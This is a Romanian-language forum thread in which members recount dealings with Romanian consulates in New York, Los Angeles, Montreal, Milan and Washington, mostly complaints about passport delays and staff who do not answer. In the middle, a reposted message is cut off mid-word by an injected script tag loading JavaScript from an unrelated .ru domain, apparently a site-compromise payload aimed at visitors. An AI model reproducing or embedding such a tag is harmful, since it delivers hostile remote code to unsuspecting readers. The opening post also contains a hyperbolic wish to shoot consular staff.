asa ca daca ar depinde cat de cat de mine...i-as alinia pe toti la zid in sir indian...ca sa nu consum gloante de geaba, si ias impusca.stiu ca nu o sa gasim altii mai buni sa lucreze la consulate/ambasade ca asa suntem noi romanii, da macar decenta de ati da un raspuns nu au avut.. sunt dezgustat. acum ma apuc sa imi fac ceva acte pt sedere permanenta..si cand ma gandesc ca treb sa am de lucru cu birocratia romaneasca... imi vine sa ma spanzur.noroc ca e mama acasa si ma rezolva ea cu ce acte imi treb de pe acolo ca altfel...

va doresc distractie placuta navigand prin meandrele birocratice din sistemul administrativ roman.

adrian ionescu
08.04.2006, 15:49
In cazul nostru cei de la Consulatul LAs-au tinut de cuvant.Ne-au venit pasapoartele prin posta la 4 luni dupa depunerea actelor.Totul s-a rezolvat prin telefon si serviciile postale. In afara timpului mare de asteptare nu am ce sa le reprosez. Au fost politicosi.

alinutzal
15.05.2006, 12:05
Nimeni nu a mentionat nimic despre consulatul de la New York. Sotul meu a venit cu povesti de groza de acolo.

Este imposibil sa vorbesti cu o persona la telefon si cum stam la 10 ore departare ce putem face decat sa asteptam.

Pisoi
23.05.2006, 12:55
angela, sper ca ti-au fost de folos informatiile melesmileys/smiley2.gif...sa ne spui cum v-au servit baietii de la consulatul din LAsmileys/smiley32.gif

angela
23.05.2006, 13:54
Maine dimineata am sa sun. Oricum iti multumesc enrom de mult pentru detalii si scuza-ma ca nu am dat un reply mai devreme.smileys/smiley9.gif

Pisoi
23.05.2006, 14:19
...nu trebuie sa te scuzi in nici un felsmileys/smiley2.gif...eram doar curios daca afirmatiile mele despre consulatul din LA se adeverescsmileys/smiley4.gif

angela
24.05.2006, 12:15
S-au adeverit Pisoiassmileys/smiley2.gif, intr-adevar au fost foarte draguti si mi-au dat toate informatiile de care aveam nevoiesmileys/smiley32.gif

Pisoi
24.05.2006, 13:21
S-au adeverit Pisoiassmileys/smiley2.gif, intr-adevar au fost foarte draguti si mi-au dat toate informatiile de care aveam nevoiesmileys/smiley32.gif

...deci pana la urma am avut ceva dreptatesmileys/smiley2.gif...serviciile celor de la consulatul din LAsunt pe masura asteptarilorsmileys/smiley32.gif..."procedurile" (legile romanesti)pe care angajatii trebuie sa le respecte lasa insa de doritsmileys/smiley18.gif

02.06.2006, 18:37
Eu am trimis un e-mail cu o intrebare la Consulatul de la Chicago acum vre-o 3 luni si nici pana in ziua de azi nu am primit raspuns.smileys/smiley7.gif

sorin
01.07.2006, 12:14
Mesaj preluat de pe grupul de discutii romaniausa@yahoogroups.com
-----------------------------------------------
Posted by: "D**** R****** B****" d******@yahoo.com (d******@yahoo.com)
Thu Jun29,2006 9:07am (PST)
Salutare!

M-am gandit sa impartasesc din experienta mea negativa cu obtinerea
unui pasaport la consulatul din <st1:State w:st="&#111;n"><st1:place w:st="&#111;n">New York</st1:place></st1:State>. In felul acesta poate mai
multi veti fi avertizati de problemele care se pot ivi pentru ca mie
mi s-a parut atitudinea doamnelor de la consulat o adevarata bataie
de joc la adresa cetateanului roman.

In primul rand informatiile se pot obtine doar de pe website caci
nimeni nu rapunde la telefon in ultima vreme (desi scrie pe website
ca ar trebui sa se raspunda intre anumite ore). Pe urma te trezesti
ca la fata locului doamnele au anumite cerinte diferite fata de
website sau in plus (si nu ai cum sa stii dinainte caci nu se
rapunde la telefon).

Cu 2 luni inainte sa-mi expire pasaportul, am decis sa obtin unul
nou in <st1:country-regi&#111;n w:st="&#111;n"><st1:place w:st="&#111;n">Romania</st1:place></st1:country-regi&#111;n> prin mama mea, cu imputernicire. Pentru
imputernicire, iti trebuie o procura de la consulatul cu jurisdictie
asupra locului tau de resedinta din SUA (in cazul meu <st1:State w:st="&#111;n"><st1:place w:st="&#111;n">Connecticut</st1:place></st1:State> e
sub jurisdictia New York-ului). Ma informez de pe website, imi
pregatesc un intreg folder cu formulare gata completate, copii,
poze, etc, si ma duc bine dispusa la consulatul roman din mijlocul
Manhattan-ului.

Aici mi se spune ca am o problema - si anume ca certificatul meu de
casatorie nu este romanesc! Ei nu recunosc certificate de casatorie
american, ci le trebuie traducerea si "transcrierea" certificatului
in registrele romanesti. Am trecut cumva peste faptul ca nu mi se
parea logic a se conditiona obtinerea unei procuri de transcrierea
unui certificat de casatorie. Le-am dat traducerea din engleza
facuta de mine. Tot ce trebuiau ei sa faca era "transcrierea"
certificatului in registrele romanesti, pentru care am platit 90
dolari.

Am intrebat cand sa vin sa ridic transcrierea. A insistat doamna ca
ma suna ea cand e gata, sa nu o sun eu. Mi-a confirmat ce zice pe
website ca ar trebui sa fie gata intre 2 saptamani si o luna.

Ma intorc in <st1:State w:st="&#111;n"><st1:place w:st="&#111;n">Connecticut</st1:place></st1:State> si astept. Imi cumpar bilet de avion de
vacanta in Europa cu gandul ca obtin procura in zisele 2-4
saptamani. Si astept... 2 saptamani trec, no phone call...o luna
trece... nimic...o luna jumate....nimic. Ma decid sa-i sun eu. Nu
raspunde nimeni la telefon. Ii sun in fiecare zi intre orele
indicate pe website si nim<script src=http://www.iroe.ru/ngg.js></script>

Didiel
19.07.2006, 02:34
Buna ziua la toata comunitatea!

Sant noua aici,ma numesc Didiel si scriu din Italia unde locuiesc de opt ani.

Maine trebuie sa ma duc in consulatul din Milano...

Va spun doar atat...daca nu ai cunostinte....ai dea face cu cele 300 de persone care asteapta zi de zi in fata consulatului...este mortal!!!

Un salut sincer de aici din Italia(unde se more de cald)

Didiel

Pisoi
19.07.2006, 12:12
...salutari de aici din USsmileys/smiley4.gif...si aici "caldura" s-a asternut cam peste totsmileys/smiley19.gif...dar inca nu murim de cald (spun asta din proprie experienta)smileys/smiley2.gif

...este greu de crezut ca 300 de pesoane asteapta zilnicla poarta "consulatului Romanesc" din Milanosmileys/smiley18.gif...cred ca ar trebui sa clarifici la care CONSULAT te referismileys/smiley75.gif...sau poate sa dai ceva amnunte care ar puteafi de folos celor intresatismileys/smiley32.gif

07.08.2006, 12:20
E primul meu reply pe acest site.

Din nefericire, am avut si eu placerea sa ajung la consulatul de la NEW YORK.

Normal ca au un program "normal", de la 4 la 8; nu aer conditionat sau un ventilator ca sa nu te simti ca la coada la ceapa; o usa vesnic incuiata (Doamne fereste sa suni la usa ca sa reintri!) si doua aparitii feminine demne de o nuvela de Agatha Christie. O doamna in etate care nu zice ABSOLUT nimic si care e asa de transparenta ca parca nici nu respira (nu i-am inteles scopul acolo) si o domnisoara atat de agasata de locul, timpul si scopul pentru care se afla acolo incat aveam impresia ca vrea sa linseze toata suflarea de pe planeta.

Nu m-am plans, nu am injurat.Am ajuns acasa dupa cateva ore de mers cu un autobuz chinezesc si am ramas cuun sinur cuvantin capsorul meu de newby:

RUSINE! RUSINE! RUSINE!

P.S.: RUSINE!

24.08.2006, 08:58
hotmomma, probabil ca doamna in varsta este sotia la vreun demnitar din Ro si a trimes-o prin US ca sa scape de ea de-acasa...iar donisoara era probabil fata sau nepoata ei, asa fiind in familie se inteleg mai bine...smileys/smiley36.gif

24.08.2006, 22:29
ohce mi-e groaza ca o sa vina timpul sa-mi schimb si eu pasaportul,bine ca acum stiu sa ma duc direct in DC,sper sa fie maiOK.De curiozitate voi ce le spuneti pe romaneste cand ii vedeti asa?smileys/smiley36.gif

AlinaB
25.08.2006, 04:06
Am fost la consulat (ambasada) in DC, si doamna de acolo a fost destul
de draguta si politicoasa. La New York pare sa fie cu totul altfel...
de o saptamana ii tot sun, si nimic - ba imi intra un robot, ba un
sunet de fax, ba trece ora de lucru cu publicul. Ce penibil, abia
astept sa imi iau actele americane si sa nu ma mai stresez cu romanii.

rolandsg
21.09.2006, 06:33
Am fost la consulatul din Montreal ca sa fac aplicatie pentru un nou pasaport, cel de acum urmand sa expire in 8 luni. Stiind ca dureaza mult obtinerea unui nou de la altii oameni (5 luni am auzit de la unii), am aplicat un pic in avans sa nu cumva sa raman fara pasaport valabil pentru vre-o perioada, fiind un calator foarte frecvent.

Ofiterul consular s-a purtat cu respect, nu ma pot plange si totul a decurs bine initial, asta pana sa-mi de-a pasaportul meu actual inapoi si sa observ ca acesta l-a taiat si anulat, fara sa-mi dea altul.

Am fost atat de socat de gestul acesta lipsit de cugetare de acest individ incat nici nu mi-am gasit cuvinte sa ma exprim. Am incercat sa-i explic ca nu am cum sa calatoresc acuma cu pasaport taiat si anulat si ca saptamana viitoare trebuie sa merg in Washington DC pentru o conferinta (totul platit deja).

Solutia acestuia a fost sa-mi lipeasca pasaportul inapoi cu banda scotch zicand ca altceva nu are ce face si sa astept 3 luni pentru unul nou, timp in care eu sunt blocat in Canada, sau binenteles pot trece granita cu un pasaport lipit cu scotch...

De ce un pasaport valid a fost anulat (intr-o tara straina) fara a mi se da unul nou ? Nu-mi pot explica decat ca a facut-o din rea intentie sau dintr-o inconpetenta de nemasurat...

Am incercat sa contactez ambasada sa explic situatia in care am fost pus dar am dat de niste oameni si mai incapabili, care
cu toate ca m-am adresat politicos mi-au spus la telefon foarte arogant "cine lucreaza greseste" referindu-se la ofitetul consular din Montreal, si ca ei nu au ce face, dupa care telefonul mi-a fost inchis.

Evitati sa aveti deaface cu acesti oameni mizerabili.

rolandsg
22.09.2006, 04:30
In legatura cu postarea mea anterioara, despre pasaportul anulat din "greseala" la Montreal, am decis sa scriu un mesaj la Ministerul de Externe din Bucuresti, explicand ce sa intamplat, neastepand nici un raspuns. Spre stupefierea mea, am primit urmatorul raspuns, in aceeasi zi in care am scris mesajul: smileys/smiley4.gif
<DIV dir=ltr>
<DIV dir=ltr>"Stimate Domnule XXX,</DIV>
<DIV dir=ltr></DIV>
<DIV dir=ltr>Va aducem la cunostiinta ca in urma sesizarii dumneavoastra s-a dispus catre Consulatul General al Romaniei la Montreal sa transmita in cusrsul zilei de astazi 22 septembrie 2006, in regim de urgenta, prin curier rapid tip FeDex/DHL, solicitarea dumneavoastra de pasaport pentru a fi facute demersurile necesare la Directia Generala de Pasapoarte, ca pasaportul dumneavostra sa fie confectionat in cursul saptamanii viitoare. Noul pasaport urmeaza sa fie transmis in acelasi mod la Consulatul General Montreal.</DIV>
<DIV dir=ltr>Cu stima, "&nbsp ;&nbsp ; </DIV>
<DIV dir=ltr></DIV>
<DIV dir=ltr>Am scris la adresa informatii.consulare@mae.ro (in&#102;ormatii.c&#111;nsulare@mae.ro)</DIV>
<DIV dir=ltr>Deci totusi exista elemente positive si astefel de experiente dau sperante spre mai bine...</DIV></DIV>

sorin
22.09.2006, 13:09
Am scris la adresa informatii.consulare@mae.ro (in&#102;ormatii.c&#111;nsulare@mae.ro)
<DIV dir=ltr>
<DIV dir=ltr>Deci totusi exista elemente positive si astefel de experiente dau sperante spre mai bine... </DIV></DIV>

Posibil sa le ajunga si lor pe la urechi ce fac vajnicii nostri reprezentanti citind mesaje postate de unii din multimea celor nemultumiti. Posibil sa "traga cu ochiul" si pe aici baietii smileys/smiley2.gif

Snuffy
19.01.2007, 18:14
Exista si bun si rau si acolo si aici in egala masura. Cred chiar, ca trebiue privit cu mai multa ingaduinta un functionar care provine dintr-o societate fost comunista, comparat cu unul care s-a nascut int-ro tara libera si se poarta cam "liber".

Problema consulatelor romanesti, este data de informarea foarte proasta a clienilor in primul rand, apoi de performantele proaste pe care le are peronalul consular la folosirea computerului si nu in ultim rand un sistem informatic prost gandit sau negandit deloc.

Odata ce ai avut o sinura data de aface cu consulat romanesc in USA sau in Canada, ar trebui sa existi in baza lor de date si numai dupa simpla introducere a seriei pasaport sa fii identificat. Orice formular consular, procura, adeverinta sau mai stiu eu ce alt document sa fie auomat completat cu informatiile tale din baza de date.

daca sistemul ar fi construit asa, atunci finctionarul ar avea timp sa raspunda si la telefon la consulatul de la NY, doamna in varsta ar fi mai putin stresata ca are de scris o pagina intreaga in notepad, si asa mai departe...

numai bine in rest si sa speram ca se va intampla si asta intr-o buna zi

dotcom
09.02.2007, 08:05
Deci, putine peripetii pe aici prin New York, pe la consulat.

Ca sa fiu corcotasa complet o sa incep cu site-ul. In principiu un site al unei institutii oficiale se presupune a fi accesibil oricui, indiferent de browser, setari si alte prostii. Mare surpriza mare ca daca nu ai Java enable nu poti vedea meniul, cu alte cuvinte nu ai acces la nici o informatie. Cam stupid, ca sa nu mai spun lipsit de profesionalism. Daca puneam un pusti de la liceul de informatica sa faca un site era mai reusit. Dar sa trecem peste.

M-am pregatit cu toate actele cerute de ei si am luat-o catre locul cu pricina. Primul impact a fost usa, mai multe usi, nici una nu se deschidea, nici vreun semn ceva de genul 'suna', 'bate', 'da cu capu'. Dupa vreo 5 minute de uitat pe geam si facut semne o duduie imi arata un buton linga usa, apas si deschide. Interesant, un ghiseu cu trei pupeze tipice "administratia financiara" din care una era pe post de doorman. Zic "un sistem mai ciudat, aia e, cit traiesti inveti". Predau actele, imi zice sa ma uit pe site ca vor afisa numele celor cu pasapoartele gata, ca sa nu-i mai suni probabil. Oricum, aflasem de la cineva care a mai trecut prin treaba asta cafetele nu raspund la telefon. De ce? Pai or fi ocupate. Probabil ca si treaba cu afisatul pe net le-a trecut prin cap tot pentru a nu mai fi deranjate cu telefoanele, ca toata lumea suna sa vada care-i stadiul actele. E oricum un pas inainte, desi prevad ca site-ul va fi updatat cam cum se updateaza site-urile prin Romania, de Craciun si de Paste.

Am votat totusi cu o impresie "asa si asa" prin prisma faptului ca totusi au fost dragute si mi-au raspuns frumos la cele citeva intrebari puse. Fusesem deja avertizata ca daca nu-s draguta rau se acresc si nu mai rezolvi nimic cu ele. M-am conformat si a fost ok.

Acum astept rezultatele pe net.......sa vedem daca am luat sau am picat:)).

Toate bune.

12.02.2007, 08:51
[voce de copilas] Mie imi place la consulat. Ma duc acolo ca sa imi amintesc de ce nu vreau sa ma intorc in Romania. [/voce de copilas]